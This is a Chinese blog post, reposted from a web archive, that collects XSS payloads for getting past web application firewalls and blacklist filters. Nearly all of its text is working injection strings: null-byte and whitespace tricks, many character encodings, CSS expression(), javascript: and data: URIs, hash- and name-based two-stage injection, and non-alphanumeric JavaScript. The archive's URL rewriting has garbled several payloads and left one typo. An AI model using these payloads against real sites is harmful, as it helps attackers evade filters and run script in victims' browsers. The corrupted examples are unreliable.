XSS绕waf合集 作者: Hack Inn 时间: August 5, 2016 分类: 技术分享 访问: 3,013 次 > 往事只能回味,我已近完全忘却了,原来我还发过这样一篇文章,一次数据库的丢失并未让我失去这些美好的回忆。原来,这边是曾今的一切。。。继续保持当年的那份初心吧,感谢Web ARCHIVE(https://web.archive.org/web/20160830125339/http://www.hackinn.com/index.php/archives/44/) ,于2020年初夏 在一个有效的xss集合中,我们发现渗透测试十分的有用,特别是在当有waf或者黑名单过滤时,但并不像你用AK-47在空中扫射一样容易。 简单字符操作。 请注意,我用十六进制表示的字符,但你不可能把它打出来。例如,\x00等于一个空字节,但在运用中使用哪种编码还要看实际情况(URL编码\x00=%00)。 HaRdc0r3 caS3 s3nsit1vITy bYpa55! ``<script>alert(1)</script>`` ``<img src="/web/20160830125339im_/http://www.hackinn.com/index.php/archives/44/1" language="VbS" onerror="mSgbOx(1)">`` 零字节字符之间的HTML属性名称、等号(IE,Safari)。 ``<img src="/web/20160830125339im_/http://www.hackinn.com/index.php/archives/44/1" onerror\x00="alert(0)"/>`` <!--more--> 斜杠字符之间的HTML属性名称、等号(IE,Firefox,Chrome,Safari)。 `` <img src="/web/20160830125339im_/http://www.hackinn.com/index.php/archives/44/1" onerror =alert(0)/>`` 垂直制表符之间的HTML属性名称、等号(IE,Safari)。 `` <img src="/web/20160830125339im_/http://www.hackinn.com/index.php/archives/44/1" onerror\x0b="alert(0)"/>`` 零字节字符之间的等号和JavaScript代码(IE)。 `` <img src="/web/20160830125339im_/http://www.hackinn.com/index.php/archives/44/1" onerror="\x00alert(0)"/>`` 零字节字符的HTML属性名称的字符之间(IE)。 `` <img src="/web/20160830125339im_/http://www.hackinn.com/index.php/archives/44/1" o\x00nerr\x00or="alert(0)"/>`` 零字节字符在HTML元素名称的字符(IE)。 ``<\x00img src='1' onerror=alert(0) />`` 零字节字符后的HTML元素名称的字符(IE,Safari)。 ``<script\x00>alert(1)</script>`` 零字节字符的HTML元素的名称字符之间(IE)。 `` <i\x00mg src="1" onerror="alert(0)"/>`` 用斜杠代替空格(IE,Firefox,Chrome,Safari)。 `` <img src="/web/20160830125339im_/http://www.hackinn.com/index.php/archives/44/1" onerror="alert(0)">`` 使用垂直制表符代替空格(IE,Safari)。 ``<img\x0bsrc='1'\x0bonerror=alert(0)>`` 在某些情况下,使用引号来代替空格(Safari)。 ``<img src="/web/20160830125339im_/http://www.hackinn.com/index.php/archives/44/1" 'onerror="alert(0)">`` ``<img src="/web/20160830125339im_/http://www.hackinn.com/index.php/archives/44/1" "onerror="alert(0)">`` 用空字节而不是在某些情况下,空格(IE)。 ``<img src="/web/20160830125339im_/http://www.hackinn.com/index.php/archives/44/1" \x00onerror="alert(0)">`` 不要使用空格(IE,Firefox,Chrome,Safari)。 ``<img src="/web/20160830125339im_/http://www.hackinn.com/index.php/archives/44/1" onerror="alert(0)">`` 前缀的URI方案。 Firefox (\x09, \x0a, \x0d, \x20) Chrome (Any character \x01 to \x20) ``<iframe src="/web/20160830125339if_/http://www.hackinn.com/index.php/archives/44/\x01javascript:alert(0)"></iframe> <!-- Example for Chrome -->`` 不大于所需(IE,火狐,Chrome,Safari)。 ``<img src="/web/20160830125339im_/http://www.hackinn.com/index.php/archives/44/1" onerror="alert(0)" <`` 额外的小于字符(即,火狐,chrome,safari)。 ``<<script>alert(0)</script>`` 反斜杠字符之间的表达和圆括号(IE)。 ``<style>body{background-color:expression\(alert(1))}</style>`` JavaScript Escaping ``<script>document.write('<a hr\ef=j\avas\cript\:a\lert(2)>blah</a>');</script>`` Encoding Galore. HTML Attribute Encoding ``<img src="/web/20160830125339im_/http://www.hackinn.com/index.php/archives/44/1" onerror="alert(1)"/>`` ``<img src="/web/20160830125339im_/http://www.hackinn.com/index.php/archives/44/1" onerror="alert(1)"/>`` ``<iframe src="https://web.archive.org/web/20160830125339if_/javascript:alert(1)" < iframe>`` ``<iframe src="https://web.archive.org/web/20160830125339if_/javascript:alert(1)"></iframe>`` URL Encoding ``<iframe src="https://web.archive.org/web/20160830125339if_/javascript:alert(1)"></iframe>`` ``<iframe src="https://web.archive.org/web/20160830125339if_/javascript:%61%6c%65%72%74%28%31%29"></iframe>`` CSS Hexadecimal Encoding (IE specific examples) ``<div style="x:expression(alert(1))">Joker</div>`` ``<div style="x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))">Joker</div>`` ``<div style="x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))">Joker</div>`` ``<div style="x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029">Joker</div>`` JavaScript (hexadecimal, octal, and unicode) ``<script>document.write('<img src=1 onerror=alert(1)>');</script>`` ``<script>document.write('\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x31\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x31\x29\x3E');</script>`` ``<script>document.write('\074\151\155\147\040\163\162\143\075\061\040\157\156\145\162\162\157\162\075\141\154\145\162\164\050\061\051\076');</script>`` ``<script>document.write('\u003C\u0069\u006D\u0067\u0020\u0073\u0072\u0063\u003D\u0031\u0020\u006F\u006E\u0065\u0072\u0072\u006F\u0072\u003D\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029\u003E');</script>`` JavaScript(十进制字符码) ``<script>document.write('<img src=1 onerror=alert(1)>');</script>`` ``<script>document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,49,32,111,110,101,114,114,111,114,61,97,108,101,114,116,40,48,41,62));</script>`` JavaScript(Unicode的函数和变量的名字) ``<script>alert(123)</script>`` ``<script>\u0061\u006C\u0065\u0072\u0074(123)</script>`` 超长UTF-8(SiteMinder真棒!) ``< = %C0%BC = %E0%80%BC = %F0%80%80%BC`` ``> = %C0%BE = %E0%80%BE = %F0%80%80%BE`` ``' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7`` ``" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2`` ``<img src="/web/20160830125339im_/http://www.hackinn.com/index.php/archives/44/1" onnerror="alert(1)">`` ``%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE`` UTF-7(缺少字符集?) ``<img src="/web/20160830125339im_/http://www.hackinn.com/index.php/archives/44/1" onerror="alert(1)"/>`` ``+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-`` Unicode .NET Ugliness ``<script>alert(1)</script>`` ``%uff1cscript%uff1ealert(1)%uff1c/script%uff1e`` 经典的ASP执行一些Unicode homoglyphic翻译…不要问为什么… ``<img src="/web/20160830125339im_/http://www.hackinn.com/index.php/archives/44/1" onerror="alert('1')">`` ``%u3008img%20src%3D%221%22%20onerror%3D%22alert(%uFF071%uFF07)%22%u232A`` 无用和/或有用的功能。 HTML 5(不全面) ``<video src="https://web.archive.org/web/20160830125339im_/http://www.w3schools.com/html5/movie.ogg" onloadedmetadata="alert(1)"/>`` ``<video src="https://web.archive.org/web/20160830125339im_/http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)"/>`` 不存在的元素使用(IE) ``<blah style="blah:expression(alert(1))"/>`` CSS Comments (IE) <div style="z:exp/*anything*/res/*here*/sion(alert(1))"/> 执行的JavaScript功能的替代方法 ``<script>window['alert'](0)</script>`` ``<script>parent['alert'](1)</script>`` ``<script>self['alert'](2)</script>`` ``<script>top['alert'](3)</script>`` 分裂到JavaScript的HTML属性 ``<img src="/web/20160830125339im_/http://www.hackinn.com/index.php/archives/44/1" alt="al" lang="ert" onerror="top[alt+lang](0)">`` 在JavaScript的HTML解析 ``<script>var junk = '</script><script>alert(1)</script>';</script>`` 在CSS的HTML解析 ``<style>body { background-image:url('http://www.blah.com/</style><script>alert(1)</script>');</style>`` XSS的XML文档中的[ DOCTYPE = text/xml ](火狐,Chrome,Safari)。 ``<?xml version="1.0" ?> <someelement> <a xmlns:a="http://www.w3.org/1999/xhtml"><a:body onload="alert(1)"/></a> </someelement>`` URI方案 (Firefox, Chrome, Safari) ``<iframe src="https://web.archive.org/web/20160830125339if_/javascript:alert(1)"></iframe>`` ``<iframe src="https://web.archive.org/web/20160830125339if_/vbscript:msgbox(1)"></iframe> `` ``<iframe src="data:text/html,<script>alert(0)</script>"></iframe>`` ``<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>`` HTTP参数污染 <pre>http://target.com/something.xxx?a=val1&a;=val2 ASP.NET a = val1,val2 ASP a = val1,val2 JSP a = val1 PHP a = val2</pre> 两阶段XSS通过片段标识符(旁路长度限制/避免服务器日志) ``<script>eval(location.hash.slice(1))</script>`` ``<script>eval(location.hash)</script> ``(Firefox) ``http://target.com/something.jsp?inject=<script>eval(location.hash.slice(1))</script>#alert(1)`` 两阶段XSS通过名称属性 ``<iframe src="https://web.archive.org/web/20160830125339if_/http://target.com/something.jsp?inject=<script>eval(name)</script>" name="alert(1)"></iframe>`` 非字母数字的疯狂之中… ``<script> $=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())(); </script>`` ``<script> (+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])() </script>`` > From: http://d3adend.org/xss/ghettoBypass 标签: none